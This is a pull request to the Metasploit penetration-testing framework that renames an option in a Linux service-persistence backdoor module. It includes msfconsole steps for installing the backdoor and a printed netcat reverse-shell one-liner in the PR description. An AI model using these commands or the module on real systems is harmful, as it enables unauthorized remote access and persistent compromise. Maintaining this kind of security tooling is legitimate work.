### PR TITLE
Fix option collision in `service_persistence`

### DIFF
--- a/documentation/modules/exploit/linux/local/service_persistence.md
+++ b/documentation/modules/exploit/linux/local/service_persistence.md
@@ -39,7 +39,7 @@
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
 3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
 
-**SHELLPATH**
+**BACKDOOR_PATH**
   
   If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
 
@@ -72,15 +72,15 @@ Get initial access
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
 
-Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
+Install our callback service (system_v w/ chkconfig).  Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.
 
     msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
     msf exploit(service_persistence) > set session 1
     session => 1
     msf exploit(service_persistence) > set verbose true
     verbose => true
-    msf exploit(service_persistence) > set SHELLPATH /bin
-    SHELLPATH => /bin
+    msf exploit(service_persistence) > set BACKDOOR_PATH /bin
+    BACKDOOR_PATH => /bin
     msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
     payload => cmd/unix/reverse_netcat
     msf exploit(service_persistence) > set lhost 192.168.199.128
@@ -260,12 +260,12 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
 
     Module options (exploit/linux/local/service_persistence):
 
-       Name        Current Setting  Required  Description
-       ----        ---------------  --------  -----------
-       SERVICE                      no        Name of service to create
-       SESSION     -1               yes       The session to run this module on.
-       SHELLPATH   /tmp             yes       Writable path to put our shell
-       SHELL_NAME                   no        Name of shell file to write
+      Name           Current Setting  Required  Description
+      ----           ---------------  --------  -----------
+      BACKDOOR_PATH  /tmp             yes       Writable path to put our shell
+      SERVICE                         no        Name of service to create
+      SESSION                         yes       The session to run this module on
+      SHELL_NAME                      no        Name of shell file to write
 
 
     Payload options (cmd/unix/reverse_netcat):

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -46,27 +46,27 @@ class MetasploitModule < Msf::Exploit::Local
           [
             ['Auto', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['System V', :runlevel => '2 3 4 5', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['Upstart', :runlevel => '2345', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['systemd', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/usr/local/bin'
+                'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
             ['systemd user', 'DefaultOptions' =>
               {
-                'SHELLPATH' => '/tmp'
+                'BACKDOOR_PATH' => '/tmp'
               }
             ]
           ],
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options(
       [
-        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
+        OptPath.new('BACKDOOR_PATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
         OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
         OptString.new('SERVICE', [false, 'Name of service to create'])
       ]
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    backdoor = write_shell(datastore['SHELLPATH'])
+    backdoor = write_shell(datastore['BACKDOOR_PATH'])
     if backdoor.nil?
       return
     end


### PR DESCRIPTION
The option `SHELLPATH` collide with `cmd/unix/reverse_netcat`, resulting in abnormal backdoors. This PR rename it to BACKDOOR_PATH.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/local/service_persistence`
- [x] `set payload cmd/unix/reverse_netcat` 
- [x] Start a handler and a meterpreter session
- [x] `set verbose true`
- [x] `exploit SESSION=<x>`
- [x] Before this fix, the generated payload will be like this: 
       `[+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /tmp >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw`  
       And after the fix:
      `[+] mkfifo /tmp/mhbeaw; nc XXXX 4444 0</tmp/mhbeaw | /bin/sh >/tmp/mhbeaw 2>&1; rm /tmp/mhbeaw`
- [x] Document written